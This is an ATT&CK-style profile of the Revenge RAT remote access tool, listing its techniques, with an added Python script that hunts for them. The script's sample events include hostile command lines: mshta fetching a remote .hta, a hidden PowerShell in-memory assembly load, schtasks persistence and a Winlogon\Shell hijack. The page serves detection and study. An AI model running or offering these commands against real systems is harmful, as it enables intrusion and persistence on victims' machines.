
Revenge RAT

Revenge RAT is a freely available remote access tool written in .NET (C#).[1][2]

ID: S0379
Type: MALWARE
Platforms: Windows
Version: 1.0

Techniques Used

Domain | ID | Name | Use
--- | --- | --- | ---
Enterprise | T1123 | Audio Capture | Revenge RAT has a plugin for microphone interception. [1][2]
Enterprise | T1059 | Command-Line Interface | Revenge RAT uses cmd.exe to execute commands and run scripts on the victim's machine. [2]
Enterprise | T1003 | Credential Dumping | Revenge RAT has a plugin for credential harvesting. [1]
Enterprise | T1132 | Data Encoding | Revenge RAT uses Base64 to encode information sent to the C2 server. [1]
Enterprise | T1202 | Indirect Command Execution | Revenge RAT uses the Forfiles utility to execute commands on the system. [2]
Enterprise | T1056 | Input Capture | Revenge RAT has a plugin for keylogging. [1][2]
Enterprise | T1170 | Mshta | Revenge RAT uses mshta.exe to run malicious scripts on the system. [2]
Enterprise | T1086 | PowerShell | Revenge RAT uses PowerShell and the .NET Reflection.Assembly class to load its own assembly into memory, avoiding a file write before execution. [2]
Enterprise | T1060 | Registry Run Keys / Startup Folder | Revenge RAT sets the Registry value HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell to survive a system reboot (this is a Winlogon value rather than a Run key; its default is explorer.exe, so any additional entry there is suspect). [1]
Enterprise | T1076 | Remote Desktop Protocol | Revenge RAT has a plugin to perform RDP access. [1]
Enterprise | T1105 | Remote File Copy | Revenge RAT has the ability to upload and download files. [1]
Enterprise | T1053 | Scheduled Task | Revenge RAT schedules tasks to run malicious scripts at different intervals. [2]
Enterprise | T1113 | Screen Capture | Revenge RAT has a plugin for screen capture. [1]
Enterprise | T1064 | Scripting | Revenge RAT executes scripts on the victim's machine. [1][2]
Enterprise | T1082 | System Information Discovery | Revenge RAT collects CPU information, OS information, and the system language. [1]
Enterprise | T1016 | System Network Configuration Discovery | Revenge RAT collects the IP address and MAC address of the system. [1]
Enterprise | T1033 | System Owner/User Discovery | Revenge RAT gathers the username from the system. [1]
Enterprise | T1065 | Uncommonly Used Port | Revenge RAT has communicated over TCP port 3333. [1]
Enterprise | T1125 | Video Capture | Revenge RAT has the ability to access the webcam. [1][2]
Enterprise | T1102 | Web Service | Revenge RAT used blogpost.com as its primary command and control server during a campaign. [2]
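The execution, persistence and network behaviours in the table map onto a small set of endpoint telemetry checks. The following is an added hunting example, not MITRE's code and not taken from the referenced reports: it encodes the Forfiles, mshta, PowerShell Reflection.Assembly, schtasks, Winlogon\Shell and port 3333 indicators as rules and runs them over constructed sample events. The event shape (process, registry and network records with Sysmon-like field names) and every path, IP and command line in the samples are assumptions made for the example.

```python
"""Hunt for Revenge RAT behaviours listed in the technique table.

Added example; not MITRE's or the malware's code. The simplified event
format (Sysmon-like field names) and all sample values are constructed.
"""
import ntpath
import re

# Constructed sample telemetry: six events that should fire, two benign controls.
SAMPLE_EVENTS = [
    {"kind": "process", "image": r"C:\Windows\System32\forfiles.exe",
     "cmdline": r'forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c start @file"'},
    {"kind": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://198.51.100.7/update.hta"},
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden [Reflection.Assembly]::Load($bytes)"},
    {"kind": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /sc minute /mo 30 /tn Update /tr C:\Users\Public\run.vbs"},
    {"kind": "registry",
     "key": r"HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "value": r"explorer.exe, C:\Users\Public\svc.exe"},
    {"kind": "network", "image": r"C:\Users\Public\svc.exe",
     "dst_ip": "198.51.100.7", "dst_port": 3333},
    # Benign controls: ordinary PowerShell use and the default Winlogon shell.
    {"kind": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell Get-Process"},
    {"kind": "registry",
     "key": r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "value": "explorer.exe"},
]

# mshta payloads arrive as a URL, an inline script protocol handler, or an .hta file.
MSHTA_PAYLOAD = re.compile(r"(https?:|vbscript:|javascript:|\.hta\b)")


def _exe(path):
    """Lower-cased file name of a Windows image path, regardless of host OS."""
    return ntpath.basename(path).lower()


def hunt(event):
    """Return the ATT&CK technique IDs from the table that this event matches."""
    hits = []
    kind = event["kind"]
    if kind == "process":
        exe = _exe(event["image"])
        cmd = event["cmdline"].lower()
        if exe == "forfiles.exe" and "/c" in cmd:          # T1202 Indirect Command Execution
            hits.append("T1202")
        if exe == "mshta.exe" and MSHTA_PAYLOAD.search(cmd):  # T1170 Mshta
            hits.append("T1170")
        if exe == "powershell.exe" and "reflection.assembly" in cmd:  # T1086 in-memory load
            hits.append("T1086")
        if exe == "schtasks.exe" and "/create" in cmd:     # T1053 Scheduled Task
            hits.append("T1053")
    elif kind == "registry":
        # Winlogon\Shell defaults to explorer.exe; anything else is a persistence hook.
        if event["key"].lower().endswith(r"\winlogon\shell"):
            if event["value"].strip().lower() != "explorer.exe":
                hits.append("T1060")
    elif kind == "network":
        if event["dst_port"] == 3333:                      # T1065 Uncommonly Used Port
            hits.append("T1065")
    return hits


def hunt_all(events):
    """Group matched events by technique ID so an analyst sees the whole chain."""
    findings = {}
    for ev in events:
        for tid in hunt(ev):
            findings.setdefault(tid, []).append(ev)
    return findings


if __name__ == "__main__":
    for tid, evs in sorted(hunt_all(SAMPLE_EVENTS).items()):
        for ev in evs:
            print(tid, ev.get("cmdline") or ev.get("value") or ev.get("dst_port"))
```

The rules are deliberately narrow string matches on the indicators this page lists; on real telemetry they need tuning (for example, excluding known administrative uses of schtasks and forfiles), and the port and Winlogon checks are most useful when correlated with the process that produced them rather than alerted on alone.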

Groups That Use This Software

ID | Name | References
--- | --- | ---
G0089 | The White Company | [1]

References